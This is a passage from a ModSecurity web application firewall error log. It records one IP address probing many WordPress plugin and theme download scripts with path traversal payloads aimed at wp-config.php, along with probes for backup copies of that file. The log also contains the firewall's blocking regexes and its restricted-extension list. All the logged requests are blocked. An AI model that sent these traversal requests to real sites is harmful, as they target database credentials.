"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZEeesV4G6tVEc6w5Us7g2wAAANA"] [Tue Apr 25 04:34:42.115283 2023] [:error] [pid 15579:tid 140446982407936] [client 37.120.213.169:41950] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "ZEeesiIlOCjnXl5KlpegigAAAFU"] [Tue Apr 25 04:34:42.241302 2023] [:error] [pid 15579:tid 140447057942272] [client 37.120.213.169:41952] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/RedSteel/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/RedSteel/download.php"] [unique_id "ZEeesiIlOCjnXl5KlpegiwAAAEw"] [Tue Apr 25 04:34:42.375204 2023] [:error] [pid 15579:tid 140447032764160] [client 37.120.213.169:41954] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:mp3 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mp3-jplayer/download.php"] [unique_id "ZEeesiIlOCjnXl5KlpegjAAAAE8"] [Tue Apr 25 04:34:42.500490 2023] [:error] [pid 15580:tid 140446990800640] [client 37.120.213.169:41956] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SCv1/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SCv1/download.php"] [unique_id "ZEeest-GjcOLRjW9Sa4WUwAAAJQ"] [Tue Apr 25 04:34:42.626470 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:41958] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adminonline/product/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adminonline/product/download.php"] [unique_id "ZEeest-GjcOLRjW9Sa4WVAAAAIM"] [Tue Apr 25 04:34:42.763059 2023] [:error] [pid 15580:tid 140446965622528] [client 37.120.213.169:41960] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZEeest-GjcOLRjW9Sa4WVQAAAJc"] [Tue Apr 25 04:34:42.890418 2023] [:error] [pid 15580:tid 140447194773248] [client 37.120.213.169:41962] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/eshop-magic/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/eshop-magic/download.php"] [unique_id "ZEeest-GjcOLRjW9Sa4WVgAAAIQ"] [Tue Apr 25 04:34:43.015933 2023] [:error] [pid 15580:tid 140447099905792] [client 37.120.213.169:41964] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ZEees9-GjcOLRjW9Sa4WVwAAAIc"] [Tue Apr 25 04:34:43.141636 2023] [:error] [pid 15580:tid 140447024371456] [client 37.120.213.169:41966] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "ZEees9-GjcOLRjW9Sa4WWAAAAJA"] [Tue Apr 25 04:34:43.274643 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41968] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/nishizawa_tmp/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/nishizawa_tmp/force-download.php"] [unique_id "ZEees9-GjcOLRjW9Sa4WWQAAAII"] [Tue Apr 25 04:34:43.409692 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:41970] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "ZEees9-GjcOLRjW9Sa4WWgAAAIk"] [Tue Apr 25 04:34:43.536658 2023] [:error] [pid 15889:tid 140447007586048] [client 37.120.213.169:41972] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/liberator/inc/php/download.php?download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/liberator/inc/php/download.php"] [unique_id "ZEees14G6tVEc6w5Us7g3AAAANI"] [Tue Apr 25 04:34:43.662633 2023] [:error] [pid 15889:tid 140447091513088] [client 37.120.213.169:41974] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/FR0_theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/FR0_theme/down.php"] [unique_id "ZEees14G6tVEc6w5Us7g3QAAAMg"] [Tue Apr 25 04:34:43.789641 2023] [:error] [pid 15889:tid 140447083120384] [client 37.120.213.169:41976] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "ZEees14G6tVEc6w5Us7g3gAAAMk"] [Tue Apr 25 04:34:43.915620 2023] [:error] [pid 15580:tid 140447091513088] [client 37.120.213.169:41978] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/clinell/include/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/clinell/include/download.php"] [unique_id "ZEees9-GjcOLRjW9Sa4WWwAAAIg"] [Tue Apr 25 04:34:44.041724 2023] [:error] [pid 15580:tid 140447066334976] [client 37.120.213.169:41980] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "ZEeetN-GjcOLRjW9Sa4WXAAAAIs"] [Tue Apr 25 04:34:44.171076 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:41982] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZEeetN-GjcOLRjW9Sa4WXQAAAI8"] [Tue Apr 25 04:34:44.296901 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:41984] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZEeetN-GjcOLRjW9Sa4WXgAAAIA"] [Tue Apr 25 04:34:59.711020 2023] [:error] [pid 15889:tid 140447203165952] [client 37.120.213.169:42042] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZEeew14G6tVEc6w5Us7g6wAAAMM"] [Tue Apr 25 04:34:59.836750 2023] [:error] [pid 15889:tid 140447099905792] [client 37.120.213.169:42044] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZEeew14G6tVEc6w5Us7g7AAAAMc"] [Tue Apr 25 04:35:03.087781 2023] [:error] [pid 15889:tid 140447015978752] [client 37.120.213.169:42054] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZEeex14G6tVEc6w5Us7g7wAAANE"] [Tue Apr 25 04:35:25.725124 2023] [:error] [pid 15580:tid 140447186380544] [client 37.120.213.169:42140] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.bak"] [unique_id "ZEee3d-GjcOLRjW9Sa4WcQAAAIU"] [Tue Apr 25 04:35:32.161667 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:42168] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag 